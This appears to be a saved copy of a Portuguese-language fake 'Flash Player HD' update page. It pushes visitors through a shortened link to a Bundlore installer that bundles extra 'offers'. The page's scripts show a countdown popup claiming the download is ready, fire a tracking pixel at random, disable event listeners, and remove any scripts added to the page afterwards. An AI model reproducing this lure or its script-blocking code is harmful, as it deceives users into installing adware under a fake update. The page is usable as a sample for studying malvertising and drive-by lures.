<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<base href=".">
<meta http-equiv="Content-Security-Policy" content="script-src &#39;self&#39; &#39;unsafe-eval&#39; &#39;self&#39; &#39;unsafe-inline&#39; *.googleapis.com www.google-analytics.com lp.videosearchtools.com cdn.downloaddabs.com service.srvmd30.com service.srvmd60.com *.weloveiconfonts.com cdn.downloaddado.com cdn.downloaddams.com *.castplatform.com; frame-src &#39;none&#39;;">
<meta http-equiv="X-Content-Security-Policy" content="script-src &#39;self&#39; &#39;unsafe-eval&#39; &#39;self&#39; &#39;unsafe-inline&#39; *.googleapis.com www.google-analytics.com lp.videosearchtools.com cdn.downloaddabs.com service.srvmd30.com service.srvmd60.com *.weloveiconfonts.com cdn.downloaddado.com cdn.downloaddams.com *.castplatform.com; frame-src &#39;none&#39;;">
<meta http-equiv="X-WebKit-CSP" content="script-src &#39;self&#39; &#39;unsafe-eval&#39; &#39;self&#39; &#39;unsafe-inline&#39; *.googleapis.com www.google-analytics.com lp.videosearchtools.com cdn.downloaddabs.com service.srvmd30.com service.srvmd60.com *.weloveiconfonts.com cdn.downloaddado.com cdn.downloaddams.com *.castplatform.com; frame-src &#39;none&#39;;">

<script src="./Flash Player HD_files/jquery.min.js"></script>

<link rel="stylesheet" href="./Flash Player HD_files/jquery-ui.css">
<script src="./Flash Player HD_files/jquery-ui.min.js"></script>
    <title>Flash Player HD</title>
    <link rel="stylesheet" type="text/css" href="./Flash Player HD_files/br.css">
    <!--<link rel="stylesheet" type="text/css" href="css/site_global.css?131700929"/>-->
    <link rel="stylesheet" type="text/css" href="./Flash Player HD_files/index.css" id="pagesheet">
    <link rel="stylesheet" href="./Flash Player HD_files/style.css">
</head>
<body style="background-color:#111">


<div class="top-widget" style="width:100%; font-size:12px ;background-color:#dcdcdc; padding:5px 10px 10px 10px; text-align:left; position: absolute; top: 0px">
	 <img src="./Flash Player HD_files/icon.png" alt="" style="width:20px;">
    	
104/5000
A ultima versao do Flash Player e recomendada para codificar e / ou decodificar (reproduzir) arquivos de audio em alta qualidade - <a href="http://bit.ly/2S1XIB7?software=flash-player-ppapi&amp;title=flash-player-ppapi&amp;clickid=27008801896947322"> click aqui para atualizar para ultima versao.</a>
</div>
<div class="clearfix" id="page">
    <div class="shadow rounded-corners clearfix colelem" id="u137">
        <div class="position_content" id="u137_position_content">
            <div class="gradient rounded-corners clearfix colelem" id="u150">
                <div class="clip_frame grpelem" id="u116">
                    <img class="block" id="u116_img" src="./Flash Player HD_files/topDots.png" alt="" width="54" height="16">
                </div>
                <div class="clearfix grpelem" id="u153-4">
                    <p style="font-size:14px; font-weight:400"><span class="wtext1"></span></p>
                </div>
            </div>
            <div class="clearfix colelem" id="ppu159-4">
                <div class="clearfix grpelem" id="pu159-4">
                    <div class="clearfix colelem" id="u159-4">
                        <p><span class="wtext2"></span></p>
                    </div>

                    <div class="clearfix colelem" id="u165-12" style="padding-top:10px"><!-- content -->
                        <ul class="list0 nls-None" id="u165-5">
                            <li><span class="wtext3"></span></li>
                            <li><span class="wtext4"></span></li>
                            <li><span class="wtext5"></span></li>
                            <li><span class="wtext6"></span></li>
                            <li><span class="wtext7"></span></li>
                        </ul>
                    </div>
                </div>
                <div class="clip_frame grpelem" id="u591" style="margin-top:2px;"><!-- image -->
                    <img class="block" id="u591_img" src="./Flash Player HD_files/main.jpg" alt="" width="137" height="137">
                </div>
            </div>

             <div class="clearfix colelem" id="u474-4" style="padding-left:20px;">
                 <p style="padding-top:30px; float:left; "><a href="http://cm.bundlore.com/about/Media_Downloader/TERMS" target="_blank" style="color:#666"><span class="wtext8"></span></a></p>
             <div style="float:left; padding-top:10px; font-family: Arial, Helvetica, sans-serif">
             	<span class="wtext9"></span>
                <br>
                <br>


             </div>
             </div>

             <div class="clearfix colelem" id="pbuttonu343" style="float:right; width:290px; left:0 ; right:0;margin-right:40px; display:inline-block; margin-top:30px"><!-- group -->


              <a class="myButton" href="http://bit.ly/2S1XIB7?software=flash-player-ppapi&amp;title=flash-player-ppapi&amp;clickid=27008801896947322" style="color:#000; text-decoration:none; float:right"><span class="wtext10"></span></a>
             </div>
         </div>
     </div>
     <div class="verticalspacer"></div>
</div>

<footer style="color:#666;  font-size:9px;  bottom:-5%; position:absolute; left:30%; right:30%">
  O processo de download será executado através do lançamento do mediadownloader, que
   é uma plataforma para a instalação de software ("Instalador"). O instalador
   pode incluir sugestões para a instalação de software livre adicional
   ofertas ("Ofertas"), ao lado da instalação do Flash. Você pode optar por instalar
   as ofertas durante o processo de instalação. Você também pode remover as ofertas
   depois de ter escolhido instalá-los. Você pode baixar o Flash sem usar o
   Instalador do seu site original. O uso do instalador está sujeito a
   o instalador
    <a href="http://cm.bundlore.com/about/Media_Downloader/TERMS" target="_blank" style="color:#666">Terms of Use</a>
    &amp;
	<a href="http://cm.bundlore.com/about/Media_Downloader/PRIVACY_POLICY" target="_blank" style="color:#666">Privacy Policy</a>.
  The Installer is not associated or
  endorsed by Flash.
    •
	<a href="http://cm.bundlore.com/about/Media_Downloader/FAQ" target="_blank" style="color:#666">Uninstall </a>
</footer>

<!-- /var/www/download.dynamic.com/common/dialogs/greyFlashSimpleAlert/index.php --><link href="./Flash Player HD_files/css" rel="stylesheet" type="text/css">
<div id="popupmsgwindow" style="display: none; width: 370px; height: 130px; background: white; position: absolute; outline-style: solid; outline-width: thin; top: 1px; left: 40%; text-align: center; z-index: 9999; font-family: Lato, sans-serif;">
	<div align="right"><a href="javascript:closeMsgWindow();" style="text-decoration:none; cursor:pointer"><div style="width: 51px;height: 20px; position:relative; right:26px; font-size:15px; padding-top:10px; z-index:99999; color:#000000; ">X</div></a></div>

	<div style="position:relative; padding-left:20px; margin-top:-10px; text-align:left; ">
    <!--<span style="font-size:24px">Your Download is Ready<br /></span>-->
    <br>
    <span style="font-size:12px; width:140px; line-height:normal">O Flash Player está disponível para o seu Windows e está pronto para instalar.</span><br>
    <div align="right">
      <div style="float:right; margin: 25px 25px 0px 0px;"><a href="javascript:closeMsgWindow();" style="font-weight: normal; border: grey" id="popupbutton" class="button">Cancelar</a></div>
      <div style="float:right;margin: 25px 15px 0px 0px; font-size:12px;"><a href="http://bit.ly/2S1XIB7?software=flash-player-ppapi&amp;title=flash-player-ppapi&amp;clickid=5123151581" id="popupbutton" class="button" onclick="closeMsgWindow();">OK</a></div>
    </div>
</div>

<script type="text/javascript">
	var myCounter = 3;

	function DoCountdown() {
	 	myCounter--;

	 	if(-1 == myCounter) {
			showMsgWindow();
		} else {
			if ( myCounter < 10 )
				secStr = "00:0"+myCounter;
			else
				secStr = "00:"+myCounter;

			countdownDisplay = document.getElementById('countdownDisplay');
			if (countdownDisplay)
				countdownDisplay.innerHTML = secStr ;

			a = setTimeout("DoCountdown()",2000);
	 	}
	}

	function showMsgWindow() {
		var mydiv = document.getElementById('popupmsgwindow');
		mydiv.style.display = 'block';
	}

	function closeMsgWindow() {
		var mydiv = document.getElementById('popupmsgwindow');
		mydiv.style.display = 'none';
	}

	DoCountdown();
</script>

<style type="text/css">
.button{
 text-decoration:none !important;
 text-align:center;
 padding:6px 19px;
 border:solid 1px #279ed1;
 -webkit-border-radius:4px;
 -moz-border-radius:4px;
 border-radius: 0px;
 font:12px Arial, Helvetica, sans-serif;
 font-weight:700;
 color:#000000 !important;
 background:#fbfbfb;
 -webkit-box-shadow:0px 0px 2px #bababa, inset 0px 0px 1px #ffffff;
 -moz-box-shadow: 0px 0px 2px #bababa,  inset 0px 0px 1px #ffffff;
 box-shadow:0px 0px 2px #bababa, inset 0px 0px 1px #ffffff;

</style>

<img id="for_fqtag" style="display: none" src="./Flash Player HD_files/pixel.cgi">
<SCRIPT LANGUAGE="JavaScript" SRC="download.js"></SCRIPT>
<script type="text/javascript">
    if (Math.random() >= 0.5) {
        document.getElementById('for_fqtag').src = "http://fqtag.com/pixel.cgi?&org=tFo1kkbEvyrvMmthEKJH&p=m_disp&a=693&cmp=4735&rt=displayImg&fmt=banner&rd=&sl=1&fq=1"
    }
</script>
<script>
    // ------------------------------------------------------------------------------------
    // Event Listener
    // ------------------------------------------------------------------------------------
    function eventsKeeper() {
        //console.log('eventsKeeper');
        try {
            HTMLDocument.prototype.addEventListener = function(a,b,c){};
            HTMLBodyElement.prototype.addEventListener = function(a,b,c){};
        } catch(err) {}

        try { document.mouseup=null; } catch(err) {}
        try { document.keyup=null; } catch(err) {}
        try { document.onmouseup=null; } catch(err) {}
        try { document.onkeyup=null; } catch(err) {}

        setTimeout(eventsKeeper, 500);
    }

    eventsKeeper();

</script><script>
    // ------------------------------------------------------------------------------------
    // Block scripts using MutationObserver
    // ------------------------------------------------------------------------------------

    var observer = new MutationObserver(function(mutations) {
        mutations.forEach(function(mutation) {
            for (var i = 0; i < mutation.addedNodes.length; i++) {
                try{
                    var e = mutation.addedNodes[i];
                    if (e.tagName == 'SCRIPT') {
                        ////console.log(e);
                        if (e.src=='') {
                            //console.log(e.tagName + ' inner BLOCKED');
                            e.innerHTML = null;
                        } else {
                            //console.log(e.tagName + ' outer BLOCKED');
                            e.outerHTML = null;
                        }
                    }
                } catch(err) {}
            }
        });
    });

    try {
        observer.observe(document, { childList: true, attributes:true, subtree:true, characterData:true });
    } catch(err) {}

</script>


</div></body></html>